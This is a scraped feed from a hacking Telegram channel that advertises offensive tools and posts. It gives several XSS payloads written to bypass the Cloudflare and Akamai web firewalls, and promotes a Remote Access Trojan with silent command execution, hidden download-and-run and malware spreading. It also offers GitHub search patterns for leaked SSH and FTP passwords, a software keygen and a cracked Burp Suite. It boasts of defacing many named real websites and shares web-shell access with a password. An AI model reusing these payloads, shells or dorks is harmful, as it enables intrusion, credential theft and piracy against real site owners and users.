Cloudflare bypass XSS payloads

Tested On: 👩‍💻

XSS Payloads:

for(t?c.outerHTmL=o:i=o=’’;i++<1024;o+=`<code onclick=this.innerHTmL=’${M(i)?’*’:n||’·’}’>#</code>${i%64?’’:’<p>’}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7
javanoscript:{alert ‘0’ }
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
<noscript/OnLoad="`${prompt``}`">

#Exploit #XSS #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

New xss payload to bypass cloudflare WAF

<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>

#XSS #Payload #Bypass #CF #WAF
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👣 haktrails 👣

💬
haktrails is a Golang client for querying SecurityTrails API data, sponsored by SecurityTrails.

📊 Tool Features:
⚪️ stdin input for easy tool chaining
⚪️ subdomain discovery
⚪️ associated root domain discovery
⚪️ associated IP discovery
⚪️ historical DNS data
⚪️ historical whois data
⚪️ DSL queries (currently a prototype)
⚪️ company discovery (discover the owner of a domain)
⚪️ whois (returns json whois data for a given domain)
⚪️ ping (check that your current SecurityTrails configuration/key is working)
⚪️ usage (check your current SecurityTrails usage)
⚪️ "json" or "list" output options for easy tool chaining
⚪️ "ZSH & Bash autocompletion"

🔼 Installation:

go install -v github.com/hakluke/haktrails@latest

💻 Usage:

Gather subdomains

cat domains.txt | haktrails subdomains
echo "yahoo.com" | haktrails subdomains

and...

😸 Github

⬇️ Download
🔒 BugCod3

#Go #Subdomain #IP #Discovery
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Main sinks that can lead to DOM-XSS

#Javacript #Dom #XSS
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🦎 Subprober 🦎

🔔 Subprober v1.0.5 - Fast Probing Tool for Penetration Testing

👁‍🗨 Overview:
Subprober v1.0.5 is a powerful and efficient tool designed for penetration testers and security professionals. This release introduces several enhancements, bug fixes, and new features to elevate your subdomain probing experience. Subprober facilitates fast and reliable information extraction, making it an invaluable asset for penetration testing workflows.

📊 Features:
⚪️ Subprober Concurrency and Accuracy are Improved with libraries like aiohttp,asyncio
⚪️ Subprober Error handling and Synchronization are improved
⚪️ Resolved some Bugs for Subprober
⚪️ Subprober Commands are changed with usefull flags
⚪️ Resolved executive errors in v1.0.4
⚪️ Subprober requires python version 3.11.x

🔼 Installation:
Method 1:

pip install git+https://github.com/sanjai-AK47/Subprober.git

Method 2:

cd Subprober
pip install .

💻 Basic Usage:

subprober -f subdomains.txt -o output.txt -tl -wc -sv  -apt -wc -ex 500 -v -o output.txt -c 20

😸 Github

⬇️ Download
🔒 BugCod3

#Subdomains #Scanner
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👻 Ghost 👻

👻 RAT (Remote Access Trojan) - Silent Botnet - Full Remote Command-Line Access - Download & Execute Programs - Spread Virus' & Malware

💬
ghost is a light RAT that gives the server/attacker full remote access to the user's command-line interpreter (cmd.exe). They are allowed to execute commands silently without the client/zombie noticing. The server/attacker is also given the ability to download and execute files on the client/zombie's computer. This is also a silent and hidden process. Like most Remote Access Trojans, this download and execution ability helps distribute viruses and other pieces of malware.

👁‍🗨
This malware is distributed simply by running zombie.exe. This file name can be changed to whatever. There is no restriction. When run, it searches for the first two arguments (IP & Port). If neither is provided, the program doesn't run. With that being said, make sure you provide the server's IP and Port in the command-line arguments. Example:

zombie.exe 127.0.0.1 27015

📊 Features:
⚪️ Remote command execution
⚪️ Silent background process
⚪️ Download and run file (Hidden)
⚪️ Safe Mode startup
⚪️ Will automatically connect to the server
⚪️ Data sent and received is encrypted (substitution cipher)
⚪️ Files are hidden
⚪️ Installed Antivirus shown to server
⚪️ Easily spread malware through download feature
⚪️ Startup info doesn't show in msconfig or other startup checking programs like CCleaner
⚪️ Disable Task Manager

😸 Github

⬇️ Download
🔒 BugCod3

#Rat #Malware #Remote #Access
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕷 hakip2host 🕷

💬
hakip2host takes a list of IP addresses via stdin, then does a series of checks to return associated domain names.

📊 Current supported checks are:
⚪️ DNS PTR lookups
⚪️ Subject Alternative Names (SANs) on SSL certificates
⚪️ Common Names (CNs) on SSL certificates

🔼 Installation:

go install github.com/hakluke/hakip2host@latest

💻 Usage:

hakip2host --help

😸 Github

⬇️ Download
🔒 BugCod3

#Osint #Recon #CIDR #HTTPS
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👁 Burpsuite Pro 👁

📂 README (en+ru) included, plz read it before run BS.

🔼 Run with Java 18 (JDK for Win included)

⬇️ Download
🔒 311138

#Burpsuite #Pro #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🌐 Bypass login authentication 🌐

⬇️ Download
🔒 BugCod3

#Bypass #Login #Page #Authentication
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🫥 MobaXterm Keygen 🔘

⚠️ Please see source code. It is not complex. ⚠️

I don't know how to make custom settings take effect in Customizer mode directly.

💬
The only way I found is that you should export custom settings to a file named MobaXterm customization.custom which is also a zip file. Then merge two zip file: Custom.mxtpro and MobaXterm customization.custom to Custom.mxtpro. Finally copy newly-generated Custom.mxtpro to MobaXterm's installation path.

📊 Postnoscript:
⚪️ This application does not have complex activation algorithm and it is truly fantastic. So please pay for it if possible.

⚪️ The file generated, Custom.mxtpro, is actually a zip file and contains a text file, Pro.key, where there is a key string.

⚪️ MobaXterm.exe has another mode. You can see it by adding a parameter "-customizer".

./MobaXterm.exe -customizer

💻 Usage:

./MobaXterm-Keygen.py "DoubleSine" 10.9

😸 Github

⬇️ Donwload
🔒 BugCod3

#Python #MobaXterm #Keygen #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

The new cs.github.com search allows for regex, which means brand new regex GitHub Dorks are possible!

Eg, find SSH and FTP passwords via connection strings with:
/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/

#infosec #cybersecurite #bugbountytip
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🔑 LEAKEY 🔑

LEAKEY is a bash noscript which checks and validates for leaked credentials. The idea behind LEAKEY is to make it highly customizable and easy to add checks for new services.

💬
LEAKEY is a tool is for validation of leaked API tokens/keys found during pentesting and Red Team Enegagments.
The noscript is really useful for Bug Hunters inorder to validate and determine the impact of leaked credentials.

LEAKEY uses a json based signature file located at ~/.leakey/signatures.json
The idea behind LEAKEY is to make it highly customizable and easy to add new services/checks once they are discovered.

LEAKEY loads the services/check list via the signature file, if you wish to add more Checks/services, simply append it in the signatures.json file

👤 Requirements:
⚪️ jq

🔼 Installation:

curl https://raw.githubusercontent.com/rohsec/LEAKEY/master/install.sh -o leaky_install.sh && chmod +x leaky_install.sh && bash leaky_install.sh

💻 Usage:
After running the installation command, simply run the below in your terminal

leaky

📊 Adding Checks:
All the checks for LEAKEY are defined in the signatures.json file.
To add any new checks, simply appened the signatures file at ~/.leakey/signatures.json

{
    "id": 0,
    "name": "Slack API Token",
    "args": [
      "token"
    ],
    "command": "curl -sX POST \"https://slack.com/api/auth.test?token=xoxp-$token&pretty=1\""
  }

😸 Github

⬇️ Download
🔒 BugCod3

#RedTeam #BugHunter #Leaked #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site
👁‍🗨 Mirror-h

Country: 🇺🇸

#Deface
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

PHP: 7.0.33

Safe Mode: OFF

ServerIP: 208.109.13.219 [🇸🇬]

HDD: Total:149.99 GB
Free:28.53 GB [19%]

Useful : gcc cc ld make php perl python ruby tar gzip nc

Downloader: wgetl ynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

🔗 Link
pwd: bugcod3

Enjoy... ⭐️

#Shell
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

🕸 Site:
https://fnsir.ru/
https://dzhakkolo.fnsir.ru/index.html
https://kerling.fnsir.ru/index.html
https://kornhol.fnsir.ru/index.html
https://krokinol.fnsir.ru/index.html
https://novus.fnsir.ru/index.html
https://shafflbord.fnsir.ru/index.html
https://worldnovuss.com/index.html

👁‍🗨 Mirror-h

Country: 🇷🇺

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
http://buildingtheblocks.life/
https://acmroofquote.com/BugCod3.html
http://ampacplumber.org/
http://bovbiz.com/
http://bucketwishconnection.com/
http://dailyhomesolutions.net/
https://dev1.shhdev.info/
http://dxperformance.com/
http://dxperformanceai.com/
http://eganpaintingpgh.com/
http://favoritedaycleaning.com/
http://fortuiteacafe.com/
http://goodworkstreeandlawn.com/
http://hirshcandies.com/
http://mind4mfg.com/
http://missionpso.org/
http://rlholliday.com/
http://shhdev.info/
http://shoreshdavid.com/
http://sunindustrial.dxpdev.site/
http://thepayrollshoppe.com/
http://trebedesign.com/
http://workbusinesssolutions.com/

👁‍🗨 Mirror-h

Country: 🇺🇸

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

PHP: 8.2.15

Safe Mode: OFF

ServerIP: 50.116.94.196 [🇺🇸]

Domains: 428 domains

HDD: Total:393.53 GB
Free:21.53 GB [5%]

Useful : make php perl python ruby tar gzip nc

Downloader: wget lynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

🔗 Link

Enjoy... ⭐️

#Shell
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

🕸 Site:
https://appie.ru/index.html
http://skupix.su/index.html
https://skupka-spb.ru/index.html
http://skypka.tv/index.html

👁‍🗨 Mirror-h

📊 Database

Country: 🇷🇺

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Bypass Cloudflare WAF (XSS without parentheses)

javanoscript:var{a:onerror}={a:alert};throw%20document.domain

#xss #bugbountytips #infosec
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Akamai WAF (new, requires a click to pop)

<A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)>

Vector PoC

#XSS #Bypass
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🐱 SiCat 🐱

The useful exploit finder

💬
SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.

🔼 Installation:

pip  install  -r  requirements.txt

💻 Usage:

python sicat.py --help

📂 Example:
From keyword:

python sicat -k telerik --exploitdb --msfmodule

From nmap output:

nmap -sV localhost -oX nmap_out | python sicat -nm --packetstorm

😸 Github

⬇️ Download
🔒 BugCod3

#Exploit #Metasploit #Finder
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3